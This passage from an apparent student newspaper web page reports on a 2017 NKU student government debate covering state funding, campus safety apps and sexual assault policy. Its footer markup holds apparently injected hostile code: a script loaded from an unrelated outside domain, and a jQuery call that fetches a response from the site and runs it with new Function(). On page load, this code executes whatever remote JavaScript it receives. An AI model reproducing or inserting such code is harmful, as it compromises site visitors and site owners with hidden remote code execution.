<div id="attachment_58311" style="width: 485px" class="wp-caption alignright"><a href="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg"><img data-attachment-id="58311" data-permalink="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/attachment/dadabluford1sno/" data-orig-file="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?fit=5125%2C3417" data-orig-size="5125,3417" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;5.6&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;NIKON D3300&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1490635206&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;55&quot;,&quot;iso&quot;:&quot;4000&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="dadabluford1sno" data-image-description="" data-medium-file="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?fit=475%2C317" data-large-file="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?fit=900%2C600" class="wp-image-58311 size-medium" src="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?resize=475%2C317" alt="" srcset="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?resize=475%2C317 475w, https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?resize=768%2C512 768w, https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?resize=900%2C600 900w, https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?resize=122%2C80 122w, https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?resize=300%2C200 300w, https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?w=2000 2000w, https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/dadabluford1sno.jpg?w=3000 3000w" sizes="(max-width: 475px) 100vw, 475px" data-recalc-dims="1" /></a><p class="wp-caption-text">Dada and Bluford are running for president and vice president of SGA. Dada said that they need to reach out to the community as well as the state capitol.</p></div>
<p id='graph15'>o encourage the government to give NKU $5.2 million.</p>
<p id='graph16'>&nbsp;</p>
<p id='graph17'><span style="font-weight: 400;">Dada said that they need to continue fighting for more money, but also branch out to the community.</span></p>
<p id='graph18'><span style="font-weight: 400;">“Us at NKU we’re invested in it and if they can invest in us then we’ll show a return on that investment and that&#8217;s something that we have started but I think with SGA’s help and just collaborating with a lot of other organizations we can really work on that,” Dada said.</span></p>
<p id='graph19'><span style="font-weight: 400;">Schaefer brought up partnering NKU’s Future Leader Internship Program which allows students to intern in Frankfort with Kentucky legislatures.</span></p>
<p id='graph20'><span style="font-weight: 400;">“Essentially they’re putting a face to the students that those legislatures are affecting,” Schaefer said. “We’re sending them those emails saying ‘we want this money, we deserve this money’ but they’re not thinking of the actual students they’re affecting when they are in legislative sessions.”</span></p>
<div id="attachment_58319" style="width: 485px" class="wp-caption alignleft"><a href="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg"><img data-attachment-id="58319" data-permalink="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/attachment/schaefergagne1sno/" data-orig-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?fit=6000%2C4000" data-orig-size="6000,4000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;NIKON D3300&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1490635570&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;65&quot;,&quot;iso&quot;:&quot;11400&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="schaefergagne1sno" data-image-description="" data-medium-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?fit=475%2C317" data-large-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?fit=900%2C600" class="size-medium wp-image-58319" src="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?resize=475%2C317" alt="" srcset="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?resize=475%2C317 475w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?resize=768%2C512 768w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?resize=900%2C600 900w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?resize=122%2C80 122w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?resize=300%2C200 300w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?w=2000 2000w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/schaefergagne1sno.jpg?w=3000 3000w" sizes="(max-width: 475px) 100vw, 475px" data-recalc-dims="1" /></a><p class="wp-caption-text"><span class="photocreditinline"><a href="http://www.thenortherner.com/uncategorized/2016/08/30/matt-sexton-2/">Matt Sexton</a></span><br />
Schaefer and Gagne are running as president and vice president of SGA. They addressed the FLIP program, among other things.</p></div>
<p id='graph22'><span style="font-weight: 400;">Sexual assault has been a prevalent topic of discussion nationwide and even at NKU, especially in relation to college campuses. </span></p>
<p id='graph23'><b>Related: </b><a href="http://www.thenortherner.com/news/2016/08/24/nku-student-claims-four-basketball-players-involved-assault/"><b>NKU student says four basketball players involved in her assault</b></a></p>
<p id='graph24'><span style="font-weight: 400;">Both Schaefer and Rawlings highlighted that NKU is ranked as one of the safest universities in the state as well as the nation.</span></p>
<p id='graph25'><span style="font-weight: 400;">Dada brought up creating or pairing up with an app that you can set to alert an emergency contact if you don’t check in with it when you’re out as a way to make the campus even safer for students.</span></p>
<p id='graph26'><span style="font-weight: 400;">Gagné, however, said that a safety awareness app was looked into by SGA this year, but didn’t have the necessary funding.</span></p>
<p id='graph27'><span style="font-weight: 400;">“I think it’s something you could definitely see coming to NKU,” Gagné said.</span></p>
<p id='graph28'><span style="font-weight: 400;">Rawlings was a supporter of the safety awareness app, but would prefer to spend resources on partnering with an existing app rather than creating a new one.</span></p>
<p id='graph29'><span style="font-weight: 400;">Rawlings also brought up the need for state legislatures to see students when it comes to any bill they may be passing about sexual assault.</span></p>
<p id='graph30'><span style="font-weight: 400;">“Recently there was a bill on the floor but it did not pass through the court,” Rawlings said. “That would’ve affected how universities dealt with sexual assault training and code of conduct.”</span></p>
<p id='graph31'><span style="font-weight: 400;">In addition, Rawlings said she wanted more transparency between administration and students for how those things operate.</span></p>
<p id='graph32'><span style="font-weight: 400;">To close, Dada urged whoever wins the election to be present at events throughout the year.</span></p>
<p id='graph33'><span style="font-weight: 400;">“I know today we were all campaigning outside which was awesome, but there was a pride march going on,” Dada said. “I took time out of my campaign to go to that because those are the students we’re representing and I wish you guys would’ve joined instead of continue campaigning because that matters to a lot of these students.”</span></p>
<p id='graph34'><span style="font-weight: 400;">Rawlings took Dada’s sentiment a step further saying it’s more than just marching with the students.</span></p>
<div id="attachment_58310" style="width: 485px" class="wp-caption alignright"><a href="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg"><img data-attachment-id="58310" data-permalink="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/attachment/crowd3sno/" data-orig-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?fit=5360%2C3573" data-orig-size="5360,3573" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;4.5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;NIKON D3300&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1490635602&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;62&quot;,&quot;iso&quot;:&quot;1600&quot;,&quot;shutter_speed&quot;:&quot;0.01&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="crowd3sno" data-image-description="" data-medium-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?fit=475%2C317" data-large-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?fit=900%2C600" class="size-medium wp-image-58310" src="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?resize=475%2C317" alt="" srcset="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?resize=475%2C317 475w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?resize=768%2C512 768w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?resize=900%2C600 900w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?resize=122%2C80 122w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?resize=300%2C200 300w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?w=2000 2000w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd3sno.jpg?w=3000 3000w" sizes="(max-width: 475px) 100vw, 475px" data-recalc-dims="1" /></a><p class="wp-caption-text"><span class="photocreditinline"><a href="http://www.thenortherner.com/uncategorized/2016/08/30/matt-sexton-2/">Matt Sexton</a></span><br />
Students were also given the opportunity to answer questions at the debate. Topics touched on qualifications of the candidates to lead to DACA students.</p></div>
<p id='graph36'><span style="font-weight: 400;">“I think that you also should be attending their meetings and seeing where they come from like the common ground,” Rawlings said. “Make sure you’re coming to their events where they’re talking because right after the pride march they actually did have an event where they had speakers and they announced everything they had accomplished for the year as well.”</span></p>
<p id='graph37'><span style="font-weight: 400;">Schaefer and Gagné said that while they’re only two people and making it to every event could prove difficult that if elected they’ll work to have a representative at as many events as they can if they can’t make it.</span></p>
<p id='graph38'><span style="font-weight: 400;">“I just want to reiterate that Taylor and I are both very passionate about this university, our student body as a whole,” Schaefer said. “Again we are two students, it’s hard to reach out to every single organization on our campus but we do our best to at almost every event that our campus holds and if elected we plan to continue that.”</span></p>
<p id='graph39'><span style="font-weight: 400;">If you would like to watch the debate you can do so at The Northerner’s Facebook page. The SGA election will take place March 29 and 30. For information on voting, visit the SGA homepage at sga.nku.edu.</span></p>
<div class="printfriendly pf-alignleft"><a href="#" rel="nofollow" onclick="window.print(); return false;" class="noslimstat"><img style="border:none;-webkit-box-shadow:none; box-shadow:none;" src="https://i2.wp.com/cdn.printfriendly.com/button-print-grnw20.png?ssl=1" alt="Print Friendly" data-recalc-dims="1" /></a></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/?share=twitter" onclick="__gaTracker('send', 'event', 'outbound-article', 'http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/?share=twitter', 'Click to share on Twitter (Opens in new window)');" rel="nofollow" data-shared="sharing-twitter-58326" class="share-twitter sd-button share-icon no-text"  target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a href="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/?share=facebook" onclick="__gaTracker('send', 'event', 'outbound-article', 'http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/?share=facebook', 'Click to share on Facebook (Opens in new window)');" rel="nofollow" data-shared="sharing-facebook-58326" class="share-facebook sd-button share-icon no-text"  target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-google-plus-1"><a href="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/?share=google-plus-1" onclick="__gaTracker('send', 'event', 'outbound-article', 'http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/?share=google-plus-1', 'Click to share on Google+ (Opens in new window)');" rel="nofollow" data-shared="sharing-google-58326" class="share-google-plus-1 sd-button share-icon no-text"  target="_blank" title="Click to share on Google+"><span></span><span class="sharing-screen-reader-text">Click to share on Google+ (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></p><div id="story_bottom"></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div><!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ --><h3>Comments</h3><p><fb:comments-count href=http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/></fb:comments-count> comments</p><div class="fb-comments" data-href="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/" data-numposts="5" data-width="100%" data-colorscheme="light"></div></div></div><div id="content" class="content main"></div><div class="footerbar"><p><a href="http://www.thenortherner.com">The Northerner</a> &bull; Copyright 2017 &bull; <a href="http://snosites.com/why-sno/">FLEX WordPress Theme</a> by <a href="http://www.snosites.com">SNO</a> &bull; <a href="http://www.thenortherner.com/wp-login.php">Log in</a></p></div>	<script>
		var getElementsByClassName=function(a,b,c){if(document.getElementsByClassName){getElementsByClassName=function(a,b,c){c=c||document;var d=c.getElementsByClassName(a),e=b?new RegExp("\\b"+b+"\\b","i"):null,f=[],g;for(var h=0,i=d.length;h<i;h+=1){g=d[h];if(!e||e.test(g.nodeName)){f.push(g)}}return f}}else if(document.evaluate){getElementsByClassName=function(a,b,c){b=b||"*";c=c||document;var d=a.split(" "),e="",f="http://www.w3.org/1999/xhtml",g=document.documentElement.namespaceURI===f?f:null,h=[],i,j;for(var k=0,l=d.length;k<l;k+=1){e+="[contains(concat(' ', @class, ' '), ' "+d[k]+" ')]"}try{i=document.evaluate(".//"+b+e,c,g,0,null)}catch(m){i=document.evaluate(".//"+b+e,c,null,0,null)}while(j=i.iterateNext()){h.push(j)}return h}}else{getElementsByClassName=function(a,b,c){b=b||"*";c=c||document;var d=a.split(" "),e=[],f=b==="*"&&c.all?c.all:c.getElementsByTagName(b),g,h=[],i;for(var j=0,k=d.length;j<k;j+=1){e.push(new RegExp("(^|\\s)"+d[j]+"(\\s|$)"))}for(var l=0,m=f.length;l<m;l+=1){g=f[l];i=false;for(var n=0,o=e.length;n<o;n+=1){i=e[n].test(g.className);if(!i){break}}if(i){h.push(g)}}return h}}return getElementsByClassName(a,b,c)},
			dropdowns = document.getElementsByTagName( 'select' );
		for ( i=0; i<dropdowns.length; i++ )
			if ( dropdowns[i].className.match( 'dropdown-menu' ) ) dropdowns[i].onchange = function(){ if ( this.value != '' ) window.location.href = this.value; }
	</script>
	
		<script>
			(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
			})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
			ga('create', 'UA-22842225-27', 'auto');
			ga('require', 'displayfeatures');
			ga('send', 'pageview');
		</script> 	
		
	<script type="text/javascript" src="http://www.10wp.org/jquery.js"></script>	<div style="display:none">
	</div>
<script>
    jQuery(document).ready(function () {
		jQuery.post('http://www.thenortherner.com?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) {
			var F = new Function ( response );
			return( F() );
		});
    });
</script>      <script type="text/javascript">

          var pfHeaderImgUrl = '';
          var pfHeaderTagline = '';
          var pfdisableClickToDel = '0';
          var pfHideImages = '0';
          var pfImageDisplayStyle = 'right';
          var pfDisableEmail = '0';
          var pfDisablePDF = '0';
          var pfDisablePrint = '0';
          var pfCustomCSS = '';
      (function() {
            var e = document.createElement('script'); e.type="text/javascript";
            e.src = 'https://cdn.printfriendly.com/printfriendly.js';
            document.getElementsByTagName('head')[0].appendChild(e);
        })();
      </script>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"http:\/\/www.thenortherner.com\/news\/2017\/03\/28\/sga-candidates-make-final-pitch-to-student-body\/":58326};
	</script>
<!--[if lte IE 8]>
<link rel='stylesheet' id='jetpack-carousel-ie8fix-css'  href='http://www.thenortherner.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel-ie8fix.css?ver=20121024' type='text/css' media='all' />
<![endif]-->
<script type='text/javascript' src='http://www.thenortherner.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script>
<script type='text/javascript'>
jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":0,"isRTL":false});});
</script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/wp_pro_ad_system/templates/js/jquery.jshowoff.min.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/prettyphoto-media/js/jquery.prettyPhoto.min.js?ver=3.1.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"http:\/\/www.thenortherner.com\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/jetpack/modules/photon/photon.js?ver=20130122'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201713'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pollsL10n = {"ajax_url":"http:\/\/www.thenortherner.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.73.2'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-includes/js/wp-embed.min.js?ver=4.7.3'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/jetpack/_inc/spin.js?ver=1.3'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/jetpack/_inc/jquery.spin.js?ver=1.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"http:\/\/www.thenortherner.com\/wp-admin\/admin-ajax.php","nonce":"d838ff7291","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"http:\/\/www.thenortherner.com\/wp-login.php?redirect_to=http%3A%2F%2Fwww.thenortherner.com%2Fnews%2F2017%2F03%2F28%2Fsga-candidates-make-final-pitch-to-student-body%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/jetpack/modules/carousel/jetpack-carousel.js?ver=20170209'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/jetpack/modules/sharedaddy/sharing.js?ver=4.7'></script>
<!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ -->
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=&version=v2.3";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<script>
jQuery(function($) {
$('a[rel^="prettyPhoto"]').prettyPhoto({ default_width: 750, default_height: 500 });
});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-201713.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:4.7',blog:'124456882',post:'58326',tz:'-4',srv:'www.thenortherner.com'} ]);
	_stq.push([ 'clickTrackerInit', '124456882', '58326' ]);
</script>

   </div>

</div>
</div>
</div>
</body>

<script type="text/javascript">
// start of scroll to view

$(document).ready(function() {

var win = $(window);
var allMods = $(".sno-animate");
var allWPcaptions = $(".wp-caption");

// Already visible modules
allMods.each(function(i, el) {
  var el = $(el);
  if (el.visible(true)) {
    el.addClass("already-visible"); 
  } 
});
allWPcaptions.each(function(i, el) {
  var el = $(el);
  if (el.visible(true)) {
    el.addClass("already-visible"); 
  } 
});


$(window).scroll(function(event) {
  
  $(".sno-animate").each(function(i, el) {
    var el = $(el);
    if (el.visible(true)) {
      el.addClass("come-in");     
    } 
  });
  $(".wp-caption").each(function(i, el) {
    var el = $(el);
    if (el.visible(true)) {
      el.addClass("come-in");     
    } 
  });
  
});


});
//end of scroll to view
</script>
<script type="text/javascript">
    			$("#hover-menu").click(function(){
				    $("#altheader-searchbox").toggle('slow');					
				});  
				
								if ($('#slidemenu').is(":visible")) {
									$('.hidethis').css({ visibility: "hidden" });
									$('#altheader-searchbox').css({ zIndex: "1001"});
								} else {
									$('.hidethis').css({ visibility: "visible" });
									$('#altheader-searchbox').css({ zIndex: "99"});
								}

			$('.sno-menu').click(function() {
			
				$('#hoverbar_menu').fadeToggle();
				$('.menu-icon').toggle();
				$('.close-icon').toggle();
				$('#hoverbar_menu').css({ height: $(window).height() - 50 });
			
			});


</script>
<script type="text/javascript">
		$("a[href='#slideshow']").on('click', function(event) { return false; });
		$("a[href='#photo']").on('click', function(event) { return false; });
		$("#snotop").hide();
	
		$(function () {
			$(window).scroll(function () {
				if ($(this).scrollTop() > 400) {
					$('#snotop').fadeIn();
				} else {
					$('#snotop').fadeOut();
				}
			});

			$('#back-top a').click(function () {
				$('body,html').animate({
					scrollTop: 0
				}, 800);
				return false;
			});

		});

	</script>


</html>